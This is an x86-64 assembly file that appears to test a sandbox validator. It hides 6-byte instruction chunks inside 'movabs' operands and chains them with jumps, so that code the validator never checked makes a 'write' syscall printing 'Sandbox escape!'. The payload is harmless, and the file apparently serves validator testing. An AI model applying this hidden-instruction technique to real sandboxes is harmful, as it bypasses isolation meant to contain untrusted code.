
/* These 2 bytes are the start of the instruction:
     48 b8 XX XX XX XX XX XX XX XX    movabs $0xXXXXXXXXXXXXXXXX, %rax
   We can fit 8 bytes of hidden instructions in the operand.
   2 of these bytes are taken up with a jump to the next hidden instruction,
   so this gives us 6 bytes to play with. */
#define PRE_PAD    .byte 0x48, 0xb8; 0:;
#define POST_PAD   jmp 0f; .align 16, 0xf4;
#define PAD        POST_PAD PRE_PAD

.global func_entry
.global func_data
.global func_end
.align 32

func_data:
PRE_PAD
func_entry:

// We would like to use:
//   leaq .Lstring(%rip), %rsi // arg 2: string
// but it does not fit into 6 bytes.
PAD leal .Lstring(%rip), %esi // arg 2: string
PAD addq %r15, %rsi

// Use 'l' forms of instructions because the 'q' forms don't
// fit into 6 bytes.
PAD movl $1, %edi  // arg 1: stdout
PAD movl $.Lstring_end - .Lstring, %edx  // arg 3: length of string
PAD movl $1, %eax  // __NR_write
PAD syscall

// Resume execution in untrusted code.
PAD jmp dest_asm
.align 32, 0xf4
func_end:

.section .rodata
.Lstring:
.string "Sandbox escape!\n"
.Lstring_end:
